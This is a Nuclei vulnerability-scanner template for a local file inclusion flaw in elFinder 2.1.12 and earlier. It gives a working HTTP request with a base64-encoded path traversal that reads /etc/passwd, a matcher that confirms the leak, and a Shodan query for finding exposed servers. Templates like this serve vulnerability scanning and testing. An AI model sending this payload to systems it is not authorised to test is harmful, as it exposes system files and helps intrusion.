nuclei-templates/http/vulnerabilities/other/elFinder-path-traversal.yaml

39 lines
1.3 KiB
YAML
Raw Permalink Normal View History

2022-07-05 03:10:51 +00:00
id: elFinder-path-traversal
info:
name: elFinder <=2.1.12 - Local File Inclusion
2022-07-05 03:10:51 +00:00
author: ritikchaddha
severity: high
description: |
elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
2022-07-05 03:10:51 +00:00
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2023-10-14 11:27:55 +00:00
metadata:
verified: true
max-request: 1
shodan-query: title:"elfinder"
2022-07-05 03:10:51 +00:00
tags: lfi,elfinder
http:
2022-07-05 03:10:51 +00:00
- raw:
- |
GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402207a84fa4d505ee01813aeca1abbfd4901a7910ca8abf6e6663cf90a67380b2b560220342914fbdc445692dcbfcaf2ce7f7df1984898f72d3101e9bea46f1c625e6ecc:922c64590222798bb761d5b6d8e72950